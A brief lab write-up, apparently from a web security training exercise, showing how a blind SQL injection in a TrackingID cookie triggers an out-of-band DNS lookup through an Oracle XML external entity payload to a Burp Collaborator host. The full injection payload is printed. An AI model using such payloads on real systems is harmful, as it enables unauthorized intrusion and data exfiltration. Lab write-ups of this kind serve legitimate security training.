We were able to see the TrackingID cookie after refreshing the page.
We used the blind SQLi payload below to perform a DNS lookup to the Burp Collaborator link we controlled:
xP9K4yKfNtZZx2mo' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://Burp Domian Collaborator/"> %remote;]>'),'/l') FROM dual--
After sending the request and polling using Burp Collaborator, we were able to see the DNS lookups from a public IP as below:
We solved the lab when we refreshed the page after the DNS response.
